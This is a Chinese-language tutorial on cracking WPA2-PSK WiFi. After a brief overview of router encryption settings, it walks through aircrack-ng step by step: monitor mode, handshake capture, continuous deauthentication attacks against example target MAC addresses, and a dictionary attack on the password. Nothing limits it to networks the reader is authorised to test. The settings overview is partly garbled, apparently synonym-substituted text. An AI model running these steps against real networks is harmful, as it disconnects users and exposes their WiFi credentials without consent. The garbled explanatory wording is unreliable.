用最樸素的方法進行WiFi無線滲透
WPA/WPA2:
WPA/WPA2是一種比WEP強壯的加密算法,挑選這種安全類型,路由器將選用Radius服務器進行身份認證并得到密鑰的WPA或WPA2安全形式。
因為要架起一臺專用的認證服務器,價值對比貴重且保護也很雜亂,所以不推薦不同用戶運用此安全類型。
WPA-PSK/WPA2-PSK:
WPA-PSK/WPA2-PSK安全類型其實是WPA/WPA2的一種簡化版本,它是依據同享密鑰的WPA形式,安全性很高,設置也相對簡單,適合不同家庭用戶和小型企業運用。
其詳細設置:
認證類型:該項用來挑選體系選用的安全形式,即主動、WPA-PSK、WPA2-PSK。
主動:若挑選該項,路由器會依據主機懇求主動挑選WPA-PSK或WPA-PSK的安全形式。
加密算法:該項用來挑選對無線數據進行加密的安全算法,選項有主動、TKIP、AES。默許選項為主動,挑選該項后,路由器將依據實踐需求主動挑選TKIP或AES加密辦法。留意11N形式不支持TKIP算法。
PSK暗碼:該項就是WPA-PSK/WPA2-PSK的初始密鑰了,在設置是,需求為8-63個ASCII字符或者8-64個十六進制的字符。
組密鑰更新周期:該項設置播送和組博密鑰的定時更新,以秒為單位,最小值為30,若該值為0,問表示不進行更新。
使用Aircrack-ng抓取WPA2-PSK握手包
主要步驟:
1.設置無線網卡至監聽模式 airmon-ng start wlan0
2.掃描周圍WPA2-PSK加密的無線信號 airodump-ng wlan0mon
3.新建一個終端,抓取握手包 airodump-ng -c [num] -w wpa2 wlan0mon 需指定信道
4.等待過程中,發起DeAuth攻擊,強制將客戶端踢下線重連,抓取握手包:
aireplay-ng -0 5 -a BSSID -c STATION wlan0mon設置為發起5次攻擊
如果想要不停的發起攻擊就是這樣aireplay-ng -0 0 -a BSSID -c STATION wlan0mon
開始操作
我使用的網卡是TL-WN722N

此時需要讓虛擬機連接網卡

連接成功后,輸入ifconfig會看到

然后輸入airmon-ng start wlan0
成功后

開始監聽(掃描周圍的無線信號)

途中CN為信道
airodump-ng -c 信道 --bssid xxx -w 保存路徑 wlan0mon
抓取目標的握手包
參數:—ivs -w FAN 保存ivs格式的包,名字為test —bssid 要破解ap的ssid

強制將客戶端踢下線aireplay-ng -0 0 -a 目標的MAC地址 -c 目標客戶端MAC wlan0mon
aireplay-ng -0 0 -a F4:83:CD:F6:15:72 -c 66:F6:84:88:3C:F1 wlan0mon
開始進行攻擊,但是有時候該命令會報錯。這是因為網卡會隨機使用信道,信道不同,多嘗試幾次同樣的命令直到成功就行了

如圖所示就證明抓到了握手包
開始破解密碼,執行
最后用好的字典爆破
如下的命令,成功后就可以看到已經破解出的密碼,如果密碼復雜一點,可能需要時間
aircrack-ng -w 字典 保存的包

aircrack-ng -w 后面都是絕對路徑